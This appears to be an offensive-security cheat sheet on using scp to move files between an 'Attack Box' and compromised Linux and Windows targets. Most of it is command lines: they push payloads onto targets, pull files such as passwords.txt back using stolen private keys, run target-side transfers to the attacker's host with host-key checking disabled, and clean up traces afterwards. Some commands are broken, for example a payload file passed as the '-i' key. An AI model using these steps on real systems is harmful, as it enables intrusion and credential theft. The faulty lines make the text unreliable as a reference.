SCP
SCP Syntax Review
The most fundamental syntax for using scp is this:
# Password Authentication
# -----------------------
# Transfer from Local to Remote
scp [local path] [username]@[target-ip]:[remote-path]
# Transfer from Remote to Local
scp [username]@[target-ip]:[remote-path] [local-path]
# Private Key Authentication
# --------------------------
# Transfer from Local to Remote
# Authenticate as [username] on [target-ip] using private key file
scp -i [path-to-private-key-file] [local path] [username]@[target-ip]:[remote-path]
# Transfer from Remote to Local
# Authenticate as [username] on [target-ip] using private key file
scp -i [path-to-private-key-file] [username]@[target-ip]:[remote-path] [local-path]
Linux Target Running SSH Server
From Attack Box
- Transfer a payload from
/tmp/payloadon the Attack Box to/tmp/pwnzon the target
Password Authentication
scp /tmp/payload johndoe@target-ip:/tmp/pwnzPrivate Key Authentication
- You have obtained a private key for the
johndoeuser on the target - You have stored the private key file in
/tmp/johndoeon the Attack Box
scp -i /path/to/privatekey /tmp/payload user@target-ip:/tmp/pwnzTo Attack Box
- You want to transfer
/home/johndoe/passwords.txtto/tmp/passwords.txtyour Attack Box - Run these commands on Attack Box and authenticate as
johndoeon the target
Password Authentication
scp user@target-ip:/home/johndoe/passwords.txt /tmp/passwords.txtPrivate Key Authentication
- You have obtained a private key for the
johndoeuser on the target - You have stored the private key file in
/tmp/johndoeon the Attack Box
scp -i /tmp/johndoe user@target-ip:/home/johndoe/passwords.txt /tmp/passwords.txtWindows Target Running SSH Server
From Attack Box
- Transfer a payload from
/tmp/payload.exeon the Attack Box toC:\Windows\Temp\on the target - Run these commands on Attack Box and authenticate as
johndoeon the target
Password Authentication
scp /tmp/payload.exe johndoe@target-ip:C:/Windows/Temp/Private Key Authentication
- You have obtained a private key for the
johndoeuser on the target - You have stored the private key file in
/tmp/johndoeon the Attack Box
scp -i /tmp/payload.exe johndoe@target-ip:C:/Windows/Temp/To Attack Box
- You want to transfer
C:\Users\JohnDoe\Desktop\passwords.txtto/tmp/passwords.txton the Attack Box - Run these commands on Attack Box and authenticate as
johndoeon the target
Password Authentication
scp johndoe@target-ip:C:/Users/JohnDoe/Desktop/passwords.txt /tmp/Private Key Authentication
- You have obtained a private key for the
johndoeuser on the target - You have stored the private key file in
/tmp/johndoeon the Attack Box
scp -i /tmp/johndoe johndoe@target-ip:C:/Users/JohnDoe/Desktop/passwords.txt /tmp/Attack Box Running SSH Server
- Create a junk user account on your attack box
- Create an SSH key pair
- Add the public key string to
/home/junkuser/.ssh/authorized_keys - Transfer the private key to the target
- Run one of the commands below
- Destroy the authentication mechanism!
- Don't leave access to your attack box on the host
- Do one of the following (or both):
- Delete the private key off the target:
rm -rf /path/to/privatekey - Delete the junkuser account from the attack box:
sudo userdel -rf junkuser
- Delete the private key off the target:
Windows Target
- SSH private key for
junkuseraccount on Attack Box is stored atC:\Windows\Temp\junk-key.pem
From Attack Box
- You want to transfer a payload from
/tmp/payload.exeon the Attack Box toC:\Windows\Temp\on the target - You will run this command on the target to authenticate as
junkuseron the Attack Box
scp -o "StrictHostKeyChecking=no" -i C:\Windows\Temp\junk-key.pem junkuser@attack-box-ip:/home/junkuser/payload.exe C:\Windows\Temp\To Attack Box
- You want to transfer
C:\Users\JohnDoe\Desktop\passwords.txtto/home/junkuser/on the Attack Box - You will run this command on the target to authenticate as
junkuseron the Attack Box
scp -o "StrictHostKeyChecking=no" -i C:\Windows\Temp\junk-key-pem C:\Users\JohnDoe\passwords.txt junkuser@attack-box-ip:/home/junkuser/Linux Target
- SSH private key for
junkuseraccount on Attack Box is stored at/tmp/junk-key.pem
From Attack Box
- You want to transfer a payload from
/home/junkuser/payloadon the Attack Box to/tmp/on the target - You will run this command on the target to authenticate as
junkuseron the Attack Box
scp -o "StrictHostKeyChecking=no" -i /tmp/junk-key.pem junkuser@attack-box-ip:/home/junkuser/payload /tmp/To Attack Box
- You want to transfer
/home/johndoe/passwords.txtto/home/junkuser/on the Attack Box - You will run this command on the target to authenticate as
junkuseron the Attack Box
scp -o "StrictHostKeyChecking=no" -i /tmp/junk-key-pem /home/johndoe/passwords.txt junkuser@attack-box-ip:/home/junkuser/